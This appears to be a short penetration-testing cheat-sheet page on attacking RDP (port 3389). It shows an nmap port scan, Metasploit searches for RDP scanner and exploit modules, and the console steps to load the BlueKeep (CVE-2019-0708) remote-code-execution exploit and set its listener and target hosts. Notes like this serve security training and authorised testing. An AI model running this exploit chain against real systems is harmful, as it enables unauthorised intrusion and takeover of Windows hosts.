3389 ~ RDP

Remote Desktop Protocol (RDP)

$ sudo nmap -sS -n -v -p3389 

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
...

Metasploit

Searching for scanners

search type:auxiliary scanner/rdp

msf6 > search type:auxiliary scanner/rdp

0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep  2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
...
3  auxiliary/scanner/rdp/rdp_scanner             .                normal  No     Identify endpoints speaking the Remote Desktop Protocol (RDP)
4  auxiliary/scanner/rdp/ms12_020_check          .                normal  Yes    MS12-020 Microsoft Remote Desktop Checker

Searching for exploits

search type:exploit rdp

msf6 > search type:exploit rdp

0  exploit/windows/rdp/cve_2019_0708_bluekeep_rce                      2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
..

Eg. Exploit: windows/rdp/cve_2019_0708_bluekeep_rce

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use 0
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost ...
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts ...
Previous143 ~ IMAPNextDatabase

Last updated